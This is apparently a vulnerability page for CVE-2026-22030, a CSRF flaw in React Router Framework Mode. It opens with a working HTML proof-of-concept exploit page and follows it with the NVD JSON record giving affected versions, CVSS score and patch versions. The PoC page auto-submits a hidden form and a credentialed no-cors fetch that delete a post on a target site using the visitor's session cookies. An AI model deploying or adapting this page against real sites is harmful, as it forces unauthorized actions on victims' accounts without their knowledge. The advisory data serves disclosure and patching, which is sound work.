CVE-2026-22030

<!-- CVE-2026-22030 PoC: CSRF Attack on React Router Framework Mode --> <!-- Attacker hosts this page to exploit the CSRF vulnerability --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2026-22030</title> </head> <body> <h1>Malicious Page - Do Not Visit</h1> <!-- Auto-submit form targeting vulnerable React Router action --> <form id="csrfForm" action="https://target-app.com/api/action/delete-post" method="POST" style="display:none;"> <!-- CSRF vulnerable endpoint - Framework Mode UI route action --> <input type="hidden" name="_action" value="deletePost"> <input type="hidden" name="postId" value="12345"> <input type="hidden" name="authenticity_token" value=""> </form> <script> // Auto-submit when page loads document.addEventListener('DOMContentLoaded', function() { // Simulate CSRF attack - form auto-submission // Browser will automatically include user's cookies document.getElementById('csrfForm').submit(); // Alternative: Fetch API with credentials fetch('https://target-app.com/api/action/delete-post', { method: 'POST', mode: 'no-cors', // Bypasses CORS for CSRF credentials: 'include', // Include cookies headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: '_action=deletePost&postId=12345' }); }); </script> <p>If you see this, the attack has been launched.</p> </body> </html> <!-- Explanation: - The form auto-submits when the victim visits this page - Browser includes victim's session cookies automatically - no-cors mode bypasses CORS restrictions - Target application must be using Framework Mode with UI routes - This PoC demonstrates how an attacker can trigger unauthorized actions -->

{"cve": {"id": "CVE-2026-22030", "sourceIdentifier": "[email protected]", "published": "2026-01-10T03:15:49.067", "lastModified": "2026-02-05T20:51:29.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "React Router is a router for React. In @remix-run/server-runtime version prior to 2.17.3. and react-router 7.0.0 through 7.11.0, React Router (or Remix v2) is vulnerable to CSRF attacks on document POST requests to UI routes when using server-side route action handlers in Framework Mode, or when using React Server Actions in the new unstable RSC modes. There is no impact if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/server-runtime version 2.17.3 and react-router version 7.12.0."}, {"lang": "es", "value": "React Router es un router para React. En la versión de @remix-run/server-runtime anterior a la 2.17.3. y react-router 7.0.0 hasta la 7.11.0, React Router (o Remix v2) es vulnerable a ataques CSRF en solicitudes POST de documentos a rutas de interfaz de usuario cuando se utilizan manejadores de acciones de ruta del lado del servidor en Modo Framework, o cuando se utilizan Acciones de Servidor de React en los nuevos modos RSC inestables. No hay impacto si se utiliza el Modo Declarativo () o el Modo de Datos (createBrowserRouter/). Este problema ha sido parcheado en la versión 2.17.3 de @remix-run/server-runtime y la versión 7.12.0 de react-router."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-352"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.11.0", "matchCriteriaId": "6928DE33-6137-4682-8610-1A6646F1B2A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:shopify:remix-run\\/react:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.17.3", "matchCriteriaId": "CD7006C4-2033-446C-A472-DAD51EB06396"}]}]}], "references": [{"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-h5cw-625j-3rxh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}